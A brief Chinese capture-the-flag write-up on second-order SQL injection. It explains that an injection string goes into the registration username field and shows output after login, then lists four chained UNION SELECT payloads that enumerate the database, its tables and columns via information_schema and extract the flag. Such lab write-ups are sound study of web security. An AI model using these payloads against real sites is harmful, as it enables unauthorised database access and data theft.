二次注入
字符型注入
在 注册界面的 username内填入注入语句,
登录得到回显
x' union select database()#x' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #x' union select group_concat(column_name) from information_schema.columns where table_name='flag' #x' union select flag from flag #
若有收获,就点个赞吧
0 人点赞
